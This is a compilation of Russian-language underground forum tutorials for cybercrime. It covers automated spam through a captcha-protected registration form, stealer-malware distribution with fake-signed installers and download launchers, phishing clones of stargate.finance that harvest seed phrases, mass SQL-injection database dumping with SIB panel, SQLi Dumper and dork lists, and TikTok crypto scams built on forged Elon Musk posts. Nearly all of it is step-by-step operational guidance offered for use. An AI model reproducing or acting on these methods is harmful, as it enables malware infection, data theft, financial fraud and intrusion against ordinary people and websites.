В поле Тип указываем значение FileName
Значение по умолчанию оставляем пустным...
В поле Сохранить в переменную >>> нажимаем Новая и вписываем латинскими
буквами название переменной в которой будет хранится путь к нашему файлу (в
моем случае это file_put) и нажимаем создать.
вот что у нас получилось
По аналогии создаем тоже самое для всех наших созданных txt файлов!
У меня вышло так
Теперь пути к файлам.
Для этого нажимаем на оранжевый значек (откроется менюшка в которой просто
выбираем наши файлы)
1- Выбираем наши файлы
2- Жмем ок
3- Жмем сохранить
Сделали... Получилось как то так)
С входными настройками закончили) Если честно я подустал скринить и показывать
каждый шаг))) ну лан ..
Закрываем менюшку с входными настройками и переходим к созданию шаблона для
автоматизации...
Создаем 4 списка, называйте так как вам удобно, у меня это base, text, proxy,
redirect
Для этого:
1 Нажимаем на панели правой кнопкой мыши
2 Выбираем Добавить список
Затем:
1 Вводим название
2 Жмем ок
Вот мы и создали первый список!
Тоже самое проделываем с остальными (всего их у нас 4! не забываем!)
Должно получиться так
Теперь нам нужно их связать с файлами в папке которые мы создавали в самом
начале.
Для этого:
1 Нажимаем на первый список
2 В открывшемся меню проставляем все галочки
3 Выбираем вставить значение из переменной
4 Выбираем переменную соответсвующую нашему списку (в данном случае это
перемееная в которой хранится путь к нашему файлу с базой из входных настроек)
Должно получиться так
так же проделываем для остальных списков!
Переходим к кубикам)
Сначала получим прокси из нашего списка, для этого:
1 Нажимаем правой кнопкой в окне проекта зеннопостера
2 Выибраем Добавить действие
3 Выбираем Списки
4 Операции над списком
Затем
1 Нажимаем на этот кубик
2 Нажимаем на <Выбирете список>
3 Выбираем наш список с прокси
После этого в этой же менюшке выбираем:
1 Получить строку
2 Первую
3 Ставим галочку Удалить после взятия
В меню переменная выбираем новая
1 Вводим название переменной в которой будет лежать наша прокся (в моем случае
это proxy)
2 Жмем Создать
Ну что ж.... Прокси мы из списка получили, теперь нам нужно его установить!)
1 Нажимаем правой кнопкой мыши в окне проекта зеннопостер
2 Выбираем Добавить действие
3 Выибраем Браузер
4 Выибраем настройки
Должен появиться вот такой вот кубик
Далее.................
1 Нажимаем на кубик который только что добавили
2 Нажимаем на меню Выберете действие
3 Выбираем Установить прокси
Затем
1 Так как мы используем сокс5 вписываем сюда socks5://
2 Без пробелов нажимаем правой кнопкой мыши там же
3 Выибраем Установить значение из переменной
4 Выбираем переменной в которой лежит наша прокся (в моем случае это proxy)
5 Проставляем все галочки
В итоге должно получится так
Мы сделали 2 кубика
Первый кубик берет первый прокси из файла с удалением и кладет в переменную
proxy
Второй кубик устанавливает прокси из переменной proxy
Теперь нам нужно сделать чтобы прокси не удалились совсем а просто добавились
в конец файла..
Для этого создаем очередной кубик)
Только в этот раз мы просто скопируем тот который у нас есть
1 Нажимаем на кубик в котором мы получаем строку с прокси
2 Нажимаем Ctr + C
3 Нажимаем Ctr + V
И у нас отобразится точно такой же куб
Только последний (который появился) мы не много изменим!
1 Нажимаем на кубик
2 Выбираем добавить строку
3 Устанавливаем значение переменной с нашим прокси (в моем случае это proxy)
Раздел с установкой прокси закончен) пойду перекурю и продолжим)
Теперь нам нужно проделать махинации) с другими списками
1 Операции на списком
2 Выбираем первый список (у меня с базой)
3 Получить строку
4 Первую
5 Ставим галочку Удалить после взятия
6 Положить в переменную >> Выбираем новая
7 Вводим имя новой переменной (в моем случае base)
8 Жмем создать
Тоже самое проделываем для списков с крео и с редиректами
ТОЛЬКО!
НЕ ставим галочку Удалять после взятия
И выбираем СЛУЧАЙНУЮ строку а не первую
Теперь нам нужно посмотреть какие данные мы отправляем пост запросом для
регистрации
Для этого
Переходм на страницу регистрации в браузере зеннопостера
1 Вписываем свой ящик
2 Вписываем крео
3 Нажимаем вкладку окна
4 Ставим галочку на Трафик
5 Нажимаем отправить
и смотрим наш пост запрос
Нажимаем на него (двойной счелчек мыши)))
Видим
1 Урл на который идет запрос
2 Реферер
Запишите куда нить себе в блокнот
Затем
1 Переходим в параметры
видим, что запросом отправляется
2 Наша почта (затем заменим на переменную с базой)
3 и 4 наш пароль (затем заменим на переменную с крео и ссылкой)
5 рекапча
6 токен
СОХРАНИМ ПАРАМЕТРЫ ЗАПРОСА В БЛОКНОТ ДЛЯ ДАЛЬНЕЙШЕЙ ОБРАБОТКИ!
Ух... Ну 2, 3, 4 шаг мы можем сделать хоть сейчас... но мы не знаем ответ
капчи и не знаем токен, а чтобы узнать не известное мы проделаем следующее..
Создаем кубик с гет запросом на страницу регистрации для этого
Павой кнопкой нажимаем в окне с проектом зеннопостера
Выбираем Добавить действие
Выбираем HTTP
Выбираем GET-запрос
Затем нажимаем на кубик и заполняем в нем поля
На вкладке Прокси Выбираем текущий прокси прокета
Вкладку дополнительно не трогаем
На вкладке основные заполняем
URL здесь ссылка на регистрацию донора
Реф можно оставить пустым
Кодировка windows-1251 (это для этого донора ! в основном ютф8)
В самом низу Положить в переменную >> Новая >> Вписываете название новой
переменной (в моем случае это get_reg)
Должно получиться так
Все заполнили! Теперь делаем запрос
1 Выделяем кубик с гет запросом
2 Нажимаем Вперед
Готово!
Запрос выполнен.. тепереь переходим в переменные смотрим какой ответ нам
пришел (скопируем для удобства в допад)
Находим сайт кей от рекпча и токен
Теперь нам нужно составить регулярки чтобы их выпарсить
Для этого
Проделайте по шагам как на картинке
Откроется Конструктор регулярных выражений!
В нем мы и составим регулярку для получения сайт кея и токена
1 В левое окошечко зенки мы вставим все что находится слева от сайт кея
2 Ставим галочку Самое короткое совпадение
3 В правое окошечко зенки мы вставим все что находится справа от сайт кея
4 готовое регулярное выражение (сохраниете в блокнот! еще понадобится )
<<Тоже самое проделывает с получением регулярки для токена>>
И так мы получили 2 регулярных выражения
1 для парсинга сайткея... Это
(?<=<div\ class="g-recaptcha"\ data-sitekey=").?(?=">
Теперь нам нужно эти регулярки применить
Для это мы создадим кубик Обработка текста
1 Правой кнопкокой по окну с проектом зенно
2 Добавить действие
3 Данные
4 Обработка текста
Получили такой кубик)
1 Нажимаем на него
2 В этом окне нажимаем правой кнопкой мыши
3 Выбираем Установить значение из переменной
4 Выбираем переменную в которой у нас ответ с гет запроса (в моем случае это
get_reg)
Опускаемся чутка ниже
1 Выбираем Regex
2 Вписываем нашу регулярку на получение сайткея
3 Выбираем новая
4 Вписываем название новой переменной в которой будет храниться наш сайт кей
(в моем случае sitekey)
5 Жмем создать
Тоже самое проделываем для Токена
Должно получиться так
Фух...
Теперь нам осталось только разгадать капчу и собственно сам постзапрос
Для того чтобы разгадать капчу делаем так:
Нажимаем на Расширенный редактор
Находим распознать рекапчу
Перетаскиваем ее в наш проект
Нажимаем На кубик Рекапчи и заполняем следующие поля
1 Модуль распознования : Тут выбираете через какой сервис будете гадать капчу
(у меня это рукапча)
2 Оставляем Распознование reCaptcha2
3 Выбираем Через SiteKey
4 Ставим галочки
5 Вставляем переменную в которую мы спарсили сайткей (у меня это переменная
sitekey)
6 Вписываем линк где находится рукапча (в данном примере это
http://www.liveinternet.ru/journal_register.php?)
Опускаемся ниже
Здесь вписываем
1 Любую переменную.. Она нам не понадобится
2 Создаем и вписываем переменную в которую будет приходить ответ с решением
капчи ! (в моем случае это cap_good )
Ну и вышли на финешную прямую..
Осталось отправить только пост запрос
Для этого создадим соответсвующий кубик
1 Нажимаем правой кнопкой выши
2 Выбираем Добавить действие
3 Выбираем HTTP
4 Вибараем POST-запрос
Далее Заполняем поля:
1 Нажимаем на созданный кубик
2 Вводим ссылку на какую будем отправлять запрос... (помним мы отснифали ее
ранее когда смотрели запросы вначале) в данном примере это
https://www.liveinternet.ru/journal_register.php
3 Реферер можете вписать https://www.liveinternet.ru
4 Вставляем данные которые отснифали в самом начале
вот эти
Только теперь нам известны все данные для передачи
Емейл
пароль (наш креатив)
Ответ от капчи
и токен
Все они уже лежат в наших переменных... нам осталось только их подставить
email=fgdfdvdfv%40sdsdad.cc&password1=journal_register.php%3F&password2=journal_register.php%3F&g-recaptcha- response=03AGdBq251AFpWzNd- qYWXG_bhWlrX8zIzG0w3NEQf0G_PwTYZmtMe8I13egzx4MYE9SynW2Rs0Bb5x4Vm41X99KYH1Gu1giuBLnS4utdK9tHfTv-o2ycbokyu6r1eLek407-g8ArjQm8rTe- yt4tdyxaYr6F39PP9RY0dGhPfb-2S0WDzIrsy0oiawUYM89AQLcpnhTHzahO4xjHJJpmaAKThKwiXc7sbv_GDQh6-iVwDJPSjq6YqnUgQVdDbaflasKMM51J4bNZLid_Ky2sHgmk7EawI8FC3ZRow4qRj0ekIWMMI0WoV8BVqv7FWD1hyfZqOomzlh2lUgGv7xpfV-6YYF-7n7hq_nYknC7Z7hUfqtBd6DKy4r3l8Fgb0KKRW134JU7vkkxmj&action=add_step0&Submit.x=73&Submit.y=19&tok=194f56a836d1716a8a8aab86a71ffa12
Разделил по цветам
В синий подставляем переменную с нашей базой
В зеленый переменную с крео и ссылкой
В желтый переменную с ответом от капчи
Фиолетовый переменную с токеном
В общем должно получиться так
Переменную для ответа можете поставить любую (в моем случае это post_otvet)
На вкладке Прокси Ставим текущий прокси проекта
На вкладке дополнительно должна стоять галочка CoockieContainer
Чекаем результат
Нажимаем в зеннопостере С начала
ждем прихода нашего письма
Письмо пришло
Теперь в настройках проекта зеннопостера отключаем браузер
Сохраняем проект
Готово!
Мы сделали автоматическую рассылку с донора на котором присуствует рекапча без
использования браузера на пост гет запросах!)
Поряядок расположения кубиков
1 Получить строку прокси
2 Установить прокси
3 Добавить строку прокси
4 Получить строку из файла базы с удалением
5 Получить крео из файла с креативами без удаления
6 Получить строку с файла редиректов без удаления
7 Гетзапрос
8 Обработка текста на сайткей
9 Обработка текста на токен
10 Распознование рекапчи
11 Пост запрос
Файлы с готовым шаблоном и ключами для поиска доноров прикреплю к теме
соксы использовались бесплатные с сайта https://checkerproxy.net/
В видосе никакие затупы не вырезал) так как можно реально иногда так же
затупить) так что видос со всеми косяками, хреновыми проксями и тп!)
Рекомендую смотреть при скорости х2!
Итак доброго времени суток.
Я недавно решил чуть отдохнуть и решил заняться тестами различных методов сборки стилаков (тестил на паблик софтах, не на своем) и прочих скам софтов, дрейнера.
Откуда лил: Google ads, тематика - крипта, через hvnc так как не нужно
заморачиваться с проксями и так намного удобней. Лил с 1 июня по 18 июня 2023
года. Статистика приведена по ним же. Все сайты кроме определенных софтов
дрейнеров \ игр были одинаковые, keywords тоже.
Сайты: выкупленные домены с небольшой индексацией в прошлом в google, нормальные сервера, не свежие ssl. Сайты крутились немного в белую, как и файлы перед началом запуска рекламный кампаний. Сайты не являются одностраничными - есть cookies politics, terms, private policy, advertising policy. Так у сайта уникальные иконки (просто переделанные оригинальные) уникальные meta данные и хеадеры, подключена аналитика от google к каждому сайту своя.
Приступим.
1) Обычный rar архив с паролем 10 символов. Файл раздут был до 960 мб. Иконка уникальная. Фейк подпись. Выдача - по ссылке на сайта (не обменник файлов) (https://domain.com/file.rar)
Перешли на сайт - 3950
Скачали - 2159
Запустили - 312 раз
Доход был мизерный и качали его почти что пустые аккаунты, крипты в них
практически нет.
2) Сборка MSIX без лаунчера. Ярлык на стиллер 960 мб. Иконка уникальная. Фейк подпись. Выдача - по ссылке на сайта (не обменник файлов) (https://domain.com/file.msix)
Перешли на сайт - 4367
Скачали - 3485
Запустили - 862 раз
Тут уже намного лучше. Доход конечно не прям топчик, так как лил напрямую на инсталлятор где лежит стиллер. На некоторых компах ловил смарт скрин. Сборка происходила в advanced installer. Просто накидал мусора и папок рядом и сделал ярлык на стилер. Как работать с advanced installer
как пример.
3) Сборка EXE без лаунчера. Ярлык на стиллер 960 мб. Иконка уникальная. Фейк подпись. Выдача - по ссылке на сайта (не обменник файлов) (https://domain.com/file.exe)
Перешли на сайт - 4371
Скачали - 2854
Запустили - 908 раз
Тут уже намного лучше чем на архив. Доход конечно не прям топчик, так как лил напрямую на инсталлятор где лежит стиллер. На некоторых компах ловил смарт скрин. Сборка происходила в InstallShield. Просто накидал мусора и папок рядом и сделал ярлык на стилер. Как работать с InstallShield
как пример.
4) Сборка EXE c лаунчером. Ярлык рабочего стола на лаунчер который подгружает файл. Иконка уникальная. Фейк подпись. Выдача - по ссылке на сайта (не обменник файлов) (https://domain.com/file.rar).
При нажатии на кнопку "Login" подгружается и запускается стилер. Софт написан
на c#. Пример урока -
по с# wpf, если чуть подучиться то сможете писать сами простые лаунчеры, главное чтобы крипт вашего стилера был FUD.
Перешли на сайт - 4874
Скачали - 3052
Запустили - 1628 раз
Тут намного лучше чем ранее, так как софт является белым и в нем ничего кроме 1 функции, которая подкачивает и запускает ваш стилер. Намного удобнее работать по данному методу. Заработок уже соответсвующий.
5) Скам на seed фразы. Сайт копия https://stargate.finance/transfer от layerzero. Полная копия за исключением мета данные и хеадеров с иконками. При попытке выводилось фейк окно метамаска о том, что нужно было ввести seed фразу. Очень тупо и старо, но есть кто ведется до сих пор.
Перешли на сайт - 13687 раз. Всего получено 492 фразы. Заработок неплохой.
6) Дрейнер. Сайт копия https://stargate.finance/transfer от layerzero. Полная копия за исключением мета данные и хеадеров с иконками. Дрейнер не паблик брал на тест у знакомого, но судя по функциям ничем от пабликов не отличается особо.
Перешли на сайт - 12906 раз. Всего получено 4730 usd. Заработок неплохой. На
дрейнеры я так лить и не научился не получается у меня работать с ними.
7) Скам игра на seed фразы. Оригинальный сайт с загрузкой игры. При регистрации просит ввести seed фразу и некоторые другие данные. Проект собран на Unreal Engine 5. После ввода данных говорит что спасибо за пред регистрацию. Геймплея - нет. Данные о регистрациях отправляются на сервер в mysql.
Перешли на сайт - 6705 раз
Скачали игру - 5907 раз
Всего я получил 3206 seed фраз, большинство пустые но все равно заработок
получился неплохой.
Судя по данной статистике можете судить сами, какой способ вам подходит больше и как лучше вам лить. Если вам нужно сделать фейк подпись то использойте SigThief - https://github.com/secretsquirrel/SigThief Если вам нужно добавить пустых байтов в файл чтобы люди не закидывали их на virustotal - https://github.com/NoneNameDeveloper/XFilePumper
Привет всем, тыкался с биржой трафика пропеллерс, качают apk вроде, ну ботов 0
[Предисловие]
Решим усадить свою жопу и написать статью, а может если и зайдет и вам понравиться, серию статей, по добыче дампов.
Хочу начать с не большого предисловия обо мне и моем опыте . Я в спам пришел недавно и огромного опыта за плечами в рассылках не имею, но сразу же смекнул, что без постоянного притока баз дампов, тут не обойтись, дабы успокоить себя мыслью, что покупные базы могут идти во много рук и быть паблик, я решил начать добывать базы самостоятельно.
Имея опыт с юникс системах и немного понимаю в Информационной Безопасности(ИБ), я начал изучать, что есть на рынке, кто как ломает сайты, что бы оттуда стянуть наши заветные дампы. Я решил начать с простого, начав парсить даркнет, на предмет софта для достижения моей цели, самое простое в использовании и не требующие почти каких либо углубленных знаний в Пентестинге я нашел так называемую SIB панель, наверное многие про нее слышали, но я все же расскажу тут, что это такое и как начать с ней работать. О более сложным способах и сочных методах я возможно изложу в следующих своих статьях.
[SIB]
Sib панель, а кто то ее называет просто Сибка, представляет собой набор скриптов, которые работают с помощью ресурсов подгруженных ей шеллов и прогибаются по сайтам донорам, ищя там всевозможные SQL инъекции, что бы получить доступ к самым Базам Данным и их таблицам. Панель быстро пробегается по списку, который вы ему подгружаете, выдергивает вам списки мыл и пассов и дампит их в свою базы с последующей сортировкой по бигам, корпам, средам . Выдергиваются все виды данных и раскладываются на 3 категории {MAIL-MAIL:PASS- MAIL:HASH}
[How to SIB]
Давайте я быстренько в 2х словах расскажу, как выглядит эта панель и как с ней работать.
Тут думаю и так все понятно, Добавляет домены (Спарсенные результаты сайтов с GET запросами, добавляет Шеллы для работы 100-200 штук)
Нажимаем кнопку START, остальную всю работу панелька сделает за вас.
Если кому то интересно, где брать панель ( есть краки отвязанные 8х версий, лицуху можно купить на форуме BHF)
[Парсинг GET запросов]
Тут, все просто покупаем лицуху A-Parser профессиональной версии, оплачиваем на ней потоки и прокси, все опции предлагают разработчики как доп опции. У ребят отличный мануал на их сайте, так что освоиться в софтинке будет достаточно просто. Так же у них есть статья как именно парсить GET запросы донор для SIB панели, посредством подставленных Dorks запросов.
[WTF is DORKS?]
Code:Copy to clipboard
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
basket.php?id=
Запросы, которые представляют из себя имя скрипта и вариант его функции, которые работают посредством GET и POST запросов. Использую такой список Dorks запросов и данный парсер, можно парсить огромное количество для нашего последующего поиска уязвимых сайтов с которых мы будем сливать дампы.
[ИТОГ]
По сути ничего сложно, парсим базы запросов использую дорки, я обычно за раз собираю парсеров по 300-500к запросов, кормлю, все это дело SIB панели, из них она принимает только 30-40% в работу, из этих 30-40%, я получаю где то ~1% уязвимых сайтов и еще примерно столько же, уязвимых но не вскрытых сайтов, которые годятся для более продвинутых Пентестеров, которые могу добивать их уже посредством SQLMAP, Разговор о котором пойдет, уже в следующей статье.
Если, вас заинтересовала тема, моей статьи, пишите, что конкретно вам интересно, я буду дополнять ее и писать вам новый контент, который будет ориентирован на добычу дампов.
[Альтернатива SIB]
{SQLi DUMPER}
Если вам не хочется мараться с покупкой Сиб Панели, а быстро и просто начать дампать базы, я вам советую познакомиться с таким инструментов как SQLi Dumper. Программа достаточно просто в использовании и ей может научиться пользовать мне кажется даже ребенок. На просторах сети можно найти кракнутую 9.5 версию, без вирусов внутри, я видел такое на codeby точно. Либо купить за 150 баксов лицуху, автора можно найти на том же bhf[.] Софт работает по тому, же принципу, что и Сиб панель. Грузим в нее список доноров , сканим, эксплуатируем, выдергиваем дампы, единственная раздница, это в том, что Сибка собирает вам еще и админ пароли и путь до админок, доп инфу, карты ссн и прочие, а тут вы сами после того как софт найдет дырявый сайт, вы кликаете на него, открываете дампер и видите содержание базы, ее структуру и количество записей, можете сами выбрать нужные вам колонки, такие как имена телефоны и все, что будет внутри. Как пользоваться софтом рассказывать не буду, т к все достаточно просто, приложу пару скринов и видео мануал.
Так выглядит интерфейс самого дампера, в котором вам остается только нажать кнопку Get tables и загрузяться все таблицы базы, выбрать нужные таблицы и колонки и начать Start dump.
На этом работа софта заканчивается, дожидаемся завершения дампинга и юзает результаты. В софте есть встроенный сканер дорков, но я ничего про него рассказать не могу т.к юзаю A-Parser.
Чего и вам советую !
[Видео мануал]
Вот подробный видео мануал, в котором от и до показано, как работает софт и
как с ним работать
Актуальная версия лицухи сейчас 10.1, в которой поправлена ошибки нагрузки
железа от работы софта.
Если вас это не пугает либо, есть дедики куда, все поставить, можете смело
юзать крак.
Даже лицуха палится АВ, так что сразу предупреждаю, что бы потом не было
камней в мой огород.
Ответственности, за то что какой крак вы скачаете не несу !
[Продвинутый парсинг с A-PARSER]
Думаю, в прошлой моей статье, вы научились или уже умеете юзать А парсер, для парсинга запросов по доркам. Давай те рассмотрим продвинутый вариант парсинга данным софтом, доноров для Сиб панелей или SQLi Dumper'a. Я не буду вам рассписывать длинные статьи, а просто солью вам свои настройка, как нужно именно выставить в парсере, так, что бы все результаты, что вы парсите выгружались только с GET запросами, приготовитесь так же загружать постоянно денег на ту же Рукапчу, т к этот проглот жрет очень дофига, у меня выходит где то в среднем 3-4к рублей на лям готовых запросов.
Готовый персет с настройками для АПАРСЕРА
Code:Copy to clipboard
eyJwcmVzZXQiOiIxIiwidmFsdWUiOnsicHJlc2V0IjoiMSIsInBhcnNlcnMiOltb IlNFOjpHb29nbGU6Ok1vZGVybiIsImRlZmF1bHQiLHsidHlwZSI6Im92ZXJyaWRl IiwiaWQiOiJwcm94eXJldHJpZXMiLCJ2YWx1ZSI6IjEwMCJ9LHsidHlwZSI6Im92 ZXJyaWRlIiwiaWQiOiJVdGlsX1JlQ2FwdGNoYTJfcHJlc2V0IiwidmFsdWUiOiJS VUNBUFRDSEEifSx7InR5cGUiOiJvdmVycmlkZSIsImlkIjoicGFnZWNvdW50Iiwi dmFsdWUiOjN9LHsidHlwZSI6Im92ZXJyaWRlIiwiaWQiOiJxdWVyeWZvcm1hdCIs InZhbHVlIjoiaW51cmw6JHF1ZXJ5In0seyJ0eXBlIjoiZmlsdGVyIiwicmVzdWx0 IjpbInNlcnAiLCJsaW5rIl0sImZpbHRlclR5cGUiOiJjb250YWluIiwidmFsdWUi OiI/Iiwib3B0aW9uIjoic2VucyJ9LHsidHlwZSI6Im92ZXJyaWRlIiwiaWQiOiJo bCIsInZhbHVlIjoiZGUifSx7InR5cGUiOiJvdmVycmlkZSIsImlkIjoiZ2wiLCJ2 YWx1ZSI6IkRFIn0seyJ0eXBlIjoib3ZlcnJpZGUiLCJpZCI6ImxyIiwidmFsdWUi OiJsYW5nX2RlIn0seyJ0eXBlIjoidW5pcXVlIiwicmVzdWx0IjpbInNlcnAiLCJs aW5rIl0sInVuaXF1ZVR5cGUiOiJzdHJpbmciLCJ1bmlxdWVHbG9iYWwiOnRydWV9 XV0sInJlc3VsdHNGb3JtYXQiOiIkcDEucHJlc2V0IiwicmVzdWx0c1NhdmVUbyI6 ImZpbGUiLCJyZXN1bHRzRmlsZU5hbWUiOiJERU5FVy50eHQiLCJhZGRpdGlvbmFs Rm9ybWF0cyI6W10sInJlc3VsdHNVbmlxdWUiOiJubyIsInF1ZXJpZXNGcm9tIjoi ZmlsZSIsInF1ZXJ5Rm9ybWF0IjpbIiRxdWVyeSJdLCJ1bmlxdWVRdWVyaWVzIjpm YWxzZSwic2F2ZUZhaWxlZFF1ZXJpZXMiOmZhbHNlLCJpdGVyYXRvck9wdGlvbnMi Onsib25BbGxMZXZlbHMiOmZhbHNlLCJxdWVyeUJ1aWxkZXJzQWZ0ZXJJdGVyYXRv ciI6ZmFsc2UsInF1ZXJ5QnVpbGRlcnNPbkFsbExldmVscyI6ZmFsc2V9LCJyZXN1 bHRzT3B0aW9ucyI6eyJvdmVyd3JpdGUiOmZhbHNlLCJ3cml0ZUJPTSI6ZmFsc2V9 LCJkb0xvZyI6ImRiIiwibGltaXRMb2dzQ291bnQiOiIwIiwia2VlcFVuaXF1ZSI6 Ik5vIiwibW9yZU9wdGlvbnMiOnRydWUsInJlc3VsdHNQcmVwZW5kIjoiIiwicmVz dWx0c0FwcGVuZCI6IiIsInF1ZXJ5QnVpbGRlcnMiOltdLCJyZXN1bHRzQnVpbGRl cnMiOltdLCJjb25maWdPdmVycmlkZXMiOltdLCJydW5UYXNrT25Db21wbGV0ZSI6 bnVsbCwidXNlUmVzdWx0c0ZpbGVBc1F1ZXJpZXNGaWxlIjpmYWxzZSwicnVuVGFz a09uQ29tcGxldGVDb25maWciOiJkZWZhdWx0IiwidG9vbHNKUyI6IiIsInByaW8i OjUsInJlbW92ZU9uQ29tcGxldGUiOmZhbHNlLCJjYWxsVVJMT25Db21wbGV0ZSI6 IiIsInF1ZXJpZXNGaWxlIjpbInJlc3VsdHMvZG9ya2xpc3QudHh0Il0sImNhdGVn b3J5IjpbXX19
[ИТОГ]
Думаю, теперь вы с легкостью, сможете напарсить себе доноров и отсканить их сиб панелью или дамперов в ручную и надампать себе баз, более продвинутый способ для взлома дампов, я постараюсь изложить в своих следующих статьях. Надеюсь, что вам понравилось и желаю вам успехов. Помните, что весь материал изложен, исключительно в познавательных целях =)))
Автор: lominis
взято с exploit.in
Представляю вашему вниманию первую статью
из серии по "Добыча траффика" (если будет спрос)
P.S. Я не претендую на авторство и на уникальность, статья предоставлена
чисто в ознакомительных целях и не несет к себе призыва к противозаконным
действиям .
Spoiler: Траффик из TikTok для iPhone
Суть работы: Заливать видео (для целевой аудитории) с новых аккаунтов TikTok и привлекать траффик за счет выхода видео в рекомендации. Регистрировать аккаунты мы будем на временные номера, затем прогревать аккаунты для максимального траста и иметь в моменте на клиенте tiktokтолько один аккаунт.
Spoiler: Настройка телефона
0. Вытащить sim (объязательно)
1. Удалить TikTok (если он есть)
2. Меняем часовой пояс и регион (под ту на которую будем лить: us,uk,de и
т.д.)
3. Меняем язык (по дефолту ставим английский)
4. Сбрасываем сетевые настройки телефона (YT shorts ru
guide)
Spoiler: Подготовка аккаунта TikTok:
1. Подключаемся к своей сети Wi-Fi
2. Скачиваем TikTok (не заходим)
3. Скачиваем Potatso (для прокси)
4. Подключаем прокси (резидентские или мобильные)
Spoiler: Регистрация и прогрев TikTok
1. Регистрируем аккаунт в TikTok на временный номер телефона (можно использовать: 5sim )
- регистрируем только 1 аккаунт
- записываем номер телефона и пароль
2. Прогреваем наш аккаунт в TikTok - Имитируем поведение реального человека
_- заходим в рекомендации и просматриваем ленту около 5 - 20 минут
- для лучшего траста пролистываем видео не относящиеся к нашей аудитории
P.s. Если льем на крипту или финансы, листаем ленту до видео связанных с нужной нам тематикой (если не понимаете, подходит или нет, смотрим на теги). Видео не относящиеся к нашей целевой аудитории пролистываем и не залипаем в них. После 2-3 видео по нашей тематике TikTok настраивает наши рекомендации и далее все чаще будет нам их показывать (такие видео нужно досматривать и лайкать, но не спамить лайками , делать все как обычный пользователь). Рекомендации можно настроить как за 4 - 5 минут так и за 10 - 20 минут все зависит от алгоритмов TikTok.
- ставим лайки (но не спамим), НЕ комментируем и _НЕ подписываемся
- ставим аватарку и био
- выходим из аккаунта TikTok и удаляем приложение.
Если не получается естественно настроить рекомендации, используем следующий метод:
- после просмотра ленты рекомендаций, ставим аватарку и био
- закрываем TikTok на 10 - 15 минут
- после заходим снова в Tik-Tok и в поиске вбиваем нужный нам запрос
(например крипто)
_- смотрим видео из поиска: некоторые смотрим и листаем - некоторые
досматриваем и лайкаем (имитируем обычного пользователя) делаем так минут 5-10
- дальше уже лента должна настроиться сама (если ваш запрос попадается реже
чем остальные видео, так же можно уже настраивать рекомендации через ленту)
- выходим из аккаунта TikTok и удаляем приложение.
Регистрируем еще 4 аккаунта по такой же схеме на одни прокси (сбрасывать настройки сети не обязательно)_
Spoiler: Подготовка браузера к съемке
Каких то особых критерий нет для съемки видео, потому что у каждого тут свой
подход и стиль.
Покажу лишь пару примеров залива (на крипто биржу):
Настройка ПК перед съемкой:
1. Скачиваем и устанавливаем программу для записи экрана. Вы можете использовать как встроенную утилиту записи экрана, находящуюся в Xbox Game Bar(открывается сочетанием клавиш Win + G), OBS или воспользоваться иными методами записи экрана.
2. Скачиваем VPN. Пользуясь браузером Chrome , можете использовать [этот](https://chrome.google.com/webstore/detail/free-vpn-chrome- extension/jaoafpkngncfpfggjefnekilbkcpjdgp).
3. В настройках браузера ОБЯЗАТЕЛЬНО поменяйте язык на английский (или на тот который будете лить)
4. Чтобы скрыть лишние элементы снизу, кликните ПКМ на «панель задач»(плашка снизу, на которой расположены меню "Пуск", открытые программы, трей, время, сеть и тому подобное), нажмите на первый снизу элемент контекстного меню - «Параметры панели задач» и включите второй сверху параметр **«Автоматически скрывать панель задач в режиме рабочего стола»
5.** Включив VPN, заходите домен и на свой аккаунт.
А дальше уже идет съемка видео для залива через биржу
Spoiler: Примеры
Примеры аккаунтов для залива с записи экрана
tiktok.com/@btc.telm
tiktok.com/@btc.xommypet
tiktok.com/@btc.aeroxy
tiktok.com/@btc.quattro
tiktok.com/@btc.berry
Пример залива через карусели
Карусель - это слайд-шоу из 5-7 фотографий, которые объясняют поэтапно
шаговые действия для регистрации и депозита на бирже. В этой схеме, это
выглядит так: известный человек, выложил пост у себя в Twitter, о том, что
биржа раздаёт деньги, по промокоду. (известные люди, это к примеру Elon Musk
или MrBeast.)
Как создать карусель?
Нажимаем на большую кнопку PLUS внизу экрана, выбираем наши фотографии в
правильном порядке, описание добавляем из БИО, ссылку на Биржу и свой
промокод, ставим от 3-х до 6 хештегов, на любую crypto тематику и опубликуем
свою карусель.
Spoiler: Как редактировать пост, через код элемента?
Как редактировать пост, через код элемента?
1. Вам нужно выбрать первый пост Elon Musk, нажать на него правой кнопкой мыши.
2. После чего нажимаем самую нижнюю кнопку "проверить".
3. Где текст выделен синим, вставляем свой текст. Так же меняем дату создание поста. Не забудьте нажать ENTER.
Spoiler: Пример карусели
1.
Spoiler: Пример карусели
2.
3.
4.
5.
6.
Spoiler: F.A.Q.
Как залить видео без бана?
Ниже будет представлен способ обхода блокировки в TikTok в Германии (и возможно, в других странах).
Click to expand...
Прежде всего, нужно понять причины блокировки вашего видео TikTok. Вот несколько возможных причин:
Запрещенные слова включают всё, что связано с раздачей денег, криптовалюты и т.д. Например, такие хэштеги, как #giveaway, #airdrop, #freecrypto, #freemoney, могут привести к блокировке. Вместо них используйте общие хэштеги, связанные с криптовалютой, например, #crypto, #cryptocurrency, #cryptonews, #cryptotok.
Click to expand...
Как обойти теневой бан в TikTok?
Если ваши аккаунты блокируются или видео моментально улетают в бан, то нужно сделать следующее:
Если это не помогло, попробуйте сбросить устройство до заводских настроек. Также возможно, что вы загружаете одинаковые видеоролики с галереи и они сразу же попадают под блокировку.
Spoiler: Руководство по смене Wi-Fi сети
Вы можете использовать приложение Tether для роутеров TP-LINK, чтобы изменить имя сети Wi-Fi быстрее, чем с помощью компьютера.
Для начала вам нужно зайти в настройки роутера. Для этого в адресной строке браузера введите одно из следующих значений:
* 192.168.0.1
* 192.168.1.1
панель TP-Link
Успешно получив доступ к панели настроек роутера, вам потребуется ввести
пароль. В большинстве случаев это следующее:
Если вы не можете войти в настройки, вам потребуется связаться с вашим провайдером и узнать пароль.
Перейдите в раздел "Network - Wireless - Wireless Settings" или "Wireless Settings".
Внесите изменения в поле "Network Name (SSID)" и выберите любое желаемое имя
сети. После завершения всех действий перезагрузите роутер, и имя вашей сети
должно измениться.
Итак данная статья будет последней и постараюсь здесь все написать и показать
без воды
В пред статье я рассказывал что нужно для работы, как находить нужные видео,
но некоторые моменты я все же упустил
Это конечно же прокси как для софта так и для залива собственно
Для залива я рекомендую использовать данный сервис это не реклама цена
достаточно демократичная и пул +- как у 911 https://www.piaproxy.com/
А так же нужны будут прокси для софта под названием YouTube365 да да это тот софт который будет крутить вам просмотры и продвигать ваше видео в топ
Так как автора нет на данном форуме я оставлю его ТГ @lagaza цена софта что то
